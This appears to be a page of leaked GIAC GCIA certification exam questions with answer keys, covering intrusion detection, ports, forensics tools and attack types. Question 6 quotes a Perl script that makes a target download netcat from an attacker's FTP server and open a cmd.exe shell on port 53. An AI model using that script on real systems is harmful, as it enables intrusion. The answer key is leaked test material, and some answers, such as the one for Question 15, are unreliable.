2023 New GCIA Exam Dumps with PDF and VCE Free: https://www.2passeasy.com/dumps/GCIA/

GIAC GCIA Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
You are implementing a host based intrusion detection system on your web server. You feel that the best way to monitor the web server is to find your baseline of activity (connections, traffic, etc.) and to monitor for conditions above that baseline. This type of IDS is called __________.

  • A. Anomaly Based
  • B. Reactive IDS
  • C. Passive IDS
  • D. Signature Based

Answer: A

NEW QUESTION 2
Which of the following utilities is used for decrypting WEP encryption on an 802.11b network?

  • A. Wireshark
  • B. NetStumbler
  • C. Airsnort
  • D. Kismet

Answer: C

NEW QUESTION 3
Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 domain-based network. Mark wants to block all NNTP traffic between the network and the Internet. How will he configure the network?

  • A. Disable anonymous logins in the NNTP configuration manager
  • B. Block port 25 by configuring the firewall
  • C. Block port 119 by configuring the firewall
  • D. Block TCP port 80 by configuring the firewall

Answer: C

NEW QUESTION 4
Which of the following can be monitored by using the host intrusion detection system (HIDS)?
Each correct answer represents a complete solution. Choose two.

  • A. Computer performance
  • B. File system integrity
  • C. Storage space on computers
  • D. System files

Answer: BD

NEW QUESTION 5
Which of the following statements is true about ICMP packets?
Each correct answer represents a complete solution. Choose all that apply.

  • A. The PING utility uses them to verify connectivity between two hosts
  • B. They guarantee the delivery of datagrams
  • C. They are encapsulated within IP datagrams
  • D. They use UDP datagrams
  • E. They are used to report errors if a problem in IP processing occurs

Answer: ACE

NEW QUESTION 6
Adam, a malicious hacker, performs the exploit given below:
#################################################################
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP Server 89
$user = "Anonymous"; # login as
$pass = 'noone@nowhere.com'; # password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?

  • A. Opens up a SMTP server that requires no username or password
  • B. Creates a share called "sasfile" on the target system
  • C. Creates an FTP server with write permissions enabled
  • D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 7
Which of the following types of firewall functions by creating two different communications, one between the client and the firewall, and the other between the firewall and the end server?

  • A. Stateful firewall
  • B. Proxy-based firewall
  • C. Packet filter firewall
  • D. Endian firewall

Answer: B

NEW QUESTION 8
Trinity wants to send an email to her friend. She uses an MD5 generator to calculate a cryptographic hash of her email to ensure the security and integrity of the email. The MD5 generator that Trinity is using operates in two steps:
Creates check file
Verifies the check file
Which of the following MD5 generators is Trinity using?

  • A. Secure Hash Signature Generator
  • B. Mat-MD5
  • C. Chaos MD5
  • D. MD5 Checksum Verifier

Answer: D

NEW QUESTION 9
Adam, a malicious hacker, purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes.
On the basis of the above information, which of the following types of attack is Adam attempting to perform?

  • A. Fraggle attack
  • B. SYN Flood attack
  • C. Land attack
  • D. Ping of death attack

Answer: D

NEW QUESTION 10
Which of the following are default ports for the FTP service?
Each correct answer represents a complete solution. Choose two.

  • A. 80
  • B. 21
  • C. 20
  • D. 443

Answer: BC

NEW QUESTION 11
An attacker wants to launch an attack on a wired Ethernet. He wants to accomplish the following tasks:
Sniff data frames on a local area network.
Modify the network traffic.
Stop the network traffic frequently.
Which of the following techniques will the attacker use to accomplish the task?

  • A. IP spoofing
  • B. Eavesdropping
  • C. ARP spoofing
  • D. Session hijacking

Answer: C

NEW QUESTION 12
Which of the following programs in UNIX is used to identify and fix lost blocks or orphans?

  • A. File Check (fck)
  • B. Block Check (bsck)
  • C. Lost Block (lck)
  • D. Filesystem Check (fsck)

Answer: D

NEW QUESTION 13
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime. Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using?

  • A. FAU
  • B. FTK Imager
  • C. Galleta
  • D. Device Seizure

Answer: D

NEW QUESTION 14
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine the drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of the hard drive into different categories. Which of the following types of image formats is NOT supported by Forensic Sorter?

  • A. EnCase image file
  • B. PFR image file
  • C. RAW image file
  • D. iso image file

Answer: D

NEW QUESTION 15
Which of the following Linux file systems is a journaled file system?

  • A. ext3
  • B. ext4
  • C. ext2
  • D. ext

Answer: A

NEW QUESTION 16
Which of the following command-line utilities is used to show the state of current TCP/IP connections?

  • A. PING
  • B. TRACERT
  • C. NETSTAT
  • D. NSLOOKUP

Answer: C

NEW QUESTION 17
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. He chooses to use printf(str) where he should ideally have used printf("%s", str).
What attack will his program expose the Web application to?

  • A. Sequence++ attack
  • B. Cross Site Scripting attack
  • C. Format string attack
  • D. SQL injection attack

Answer: C

NEW QUESTION 18
Which of the following IPv6 transition technologies is used by DirectAccess if a user is in a remote location and a public IPv4 address, instead of a public IPv6 address, has been assigned to the computer?

  • A. ISATAP
  • B. PortProxy
  • C. 6to4
  • D. Teredo

Answer: C

NEW QUESTION 19
Which of the following types of write blocker device uses one interface for one side and a different one for the other?

  • A. Pros
  • B. Tailgate
  • C. Indiff
  • D. Native

Answer: B
